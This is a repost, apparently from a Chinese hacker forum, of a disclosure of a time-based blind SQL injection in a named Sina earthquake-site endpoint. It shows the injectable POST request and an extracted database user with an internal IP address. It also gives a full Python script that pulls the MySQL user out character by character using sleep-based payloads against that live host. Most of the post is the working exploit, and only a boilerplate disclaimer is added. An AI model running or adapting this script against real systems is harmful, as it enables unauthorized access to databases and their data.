新浪某站点MySQL盲注(附验证脚本) - 中国红客帝国官网-Honker EmPire For China - Powered by H.E.C
网络爱好者的栖息之地,让我们的网络技术更上一层楼!!!

新浪某站点MySQL盲注(附验证脚本)

admin 漏洞预警

简要描述:

code 区域
POST http://php.tsearthquake.sina.com.cn/addok.php



content=1&content1=*&email=&name=&singes=&type=20



参数content1可注入。 MySQL time blind.

漏洞证明:

猜解user:

code 区域
phptsearthquake@10.71.10.42


sina.com.cn.mysqli_3.png



python脚本:

code 区域
#encoding=utf-8

import httplib

import time

import string

import sys

import random





headers = {'Content-Type':'application/x-www-form-urlencoded'}

payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'



print 'Start to retrive MySQL User:'

user = ''



for i in range(1, 28):

    for payload in payloads:

        try:

            s = "ascii(mid(user(),%s,1))=%s" % (i, ord(payload))

            s = "content=1&content1=aa'XOR(if(" + s + ",sleep(5),0))OR'bb&email=&name=&singes=&type=20"

            conn = httplib.HTTPConnection('php.tsearthquake.sina.com.cn', timeout=5)

            conn.request(method='POST',

                         url="/addok.php",

                         body=s,

                         headers=headers)

            start_time = time.time()

            conn.getresponse()

            conn.close()

            print '.',

        except:

            user += payload

            print '[in progress]', user

            break



print '[Done] MySQL user is %s' % user
标签: 新浪某站点

免责声明:

本站提供的资源,都来自网络,版权争议与本站无关,所有内容及软件的文章仅限用于学习和研究目的。不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负,我们不保证内容的长久可用性,通过使用本站内容随之而来的风险与本站无关,您必须在下载后的24个小时之内,从您的电脑/手机中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。侵删请致信E-mail:22365412@qq.com

同类推荐
评论列表